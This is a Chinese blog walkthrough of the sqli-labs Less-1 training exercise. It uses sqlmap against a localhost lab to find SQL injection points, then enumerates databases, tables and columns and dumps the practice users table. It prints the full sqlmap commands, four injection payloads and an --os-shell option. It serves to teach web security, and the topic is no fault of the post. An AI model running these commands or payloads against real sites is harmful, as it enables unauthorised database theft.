Less-1(sqlmap自动注入攻击)--sqli

小野猪都有白菜拱2024-01-29 14:57

环境准备

打开火狐浏览器,进入sqli第一关的页面

工具准备

sqlmap

|-----------------------|---------------------------|
| 参数 | 解释 |
| -u URL | 指定目标URL进行注入测试。 |
| --data=DATA | 指定POST请求的数据进行注入测试 |
| --cookie=COOKIE | 指定用于身份验证的cookie进行注入测试 |
| -p PARAMETER | 指定要测试的参数 |
| --level=LEVEL | 设置测试的深度级别(1-5) |
| --risk=RISK | 设置测试的风险级别(1-3) |
| --dbs | 获取数据库管理系统的信息 |
| --tables | 获取数据库中表的信息 |
| --dump | 获取数据库表中的数据 |
| --os-shell | 尝试获取操作系统级别的shell访问权限 |

具体步骤

1.在搜索栏中输入"?id=1",回车(一定要使用英文输入)

查看结果发现,可以访问到名字和密码

在搜索栏中输入"?id=2",回车

?id=3,回车

2.打开命令行"cmd",使用sqlmap进行自动注入攻击
第一步:在cmd下
复制代码 
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1"        
 //使用sqlmap对此url网页进行自动注入扫描,找注入点

遇见[y/n]都直接回车跳过,得到

复制代码 
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 2363=2363 AND 'waaH'='waaH

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x71706b7071,(SELECT (ELT(2276=2276,1))),0x717a6b6a71),2276) AND 'AJPH'='AJPH

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9037 FROM (SELECT(SLEEP(5)))yKXS) AND 'prBO'='prBO

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-1860' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b7071,0x557348446b50717065444f776f784179496e744d587a674f496b794d72454c45666e504d796e6456,0x717a6b6a71)-- -
---

表明有四种注入漏洞:boolean-based blind,error-based,time-based blind,UNION query

第二步:爆库名
复制代码 
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --dbs
复制代码 
available databases [9]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] pikachu
[*] pkxss
[*] security
[*] test
第三步:爆表名
复制代码 
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security --tables
复制代码 
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
第四步:爆字段名
复制代码 
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T users --columns
复制代码 
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
第五步:爆数据
复制代码 
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T users -C id,username,password --dump
复制代码 
Database: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | Dumb     | Dumb       |
| 2  | Angelina | I-kill-you |
| 3  | Dummy    | p@ssword   |
| 4  | secure   | crappy     |
| 5  | stupid   | stupidity  |
| 6  | superman | genious    |
| 7  | batman   | mob!le     |
| 8  | admin    | admin      |
| 9  | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+

完成,就得到了账户和密码

相关推荐
tod11316 小时前
力扣高频 SQL 50 题阶段总结(四)
开发语言·数据库·sql·算法·leetcode
踢足球092917 小时前
寒假打卡:2026-01-31
数据库·sql
山峰哥19 小时前
SQL优化全解析:从索引策略到查询性能飞跃
大数据·数据库·sql·编辑器·深度优先
Apple_羊先森19 小时前
ORACLE数据库巡检SQL脚本--7、检查不起作用的约束
数据库·sql·oracle
怣5020 小时前
MySQL表的数据检索:从基础到精通
数据库·sql·mysql
-XWB-21 小时前
【Oracle】Oracle诊断系列(3/6):性能瓶颈定位——从SQL到I/O的全面分析
数据库·sql·oracle
小邓睡不饱耶21 小时前
Hive 实战:数据仓库建模、SQL 进阶与企业级案例
数据仓库·hive·sql
czlczl2002092521 小时前
MyBatis-Plus SQL自动填充字段
sql·tomcat·mybatis
冰暮流星21 小时前
sql之删除与软删除
数据库·sql
独断万古他化1 天前
【MyBatis-Plus 进阶】注解配置、条件构造器与自定义 SQL的复杂操作详解
sql·mybatis·mybatis-plus·条件构造器
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书042026美赛A题智能手机电池续航时间预测的连续时间数学模型05OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)06Linux下V2Ray安装配置指南07UV安装并设置国内源08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services092025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望10Claude Code Skills 实用使用手册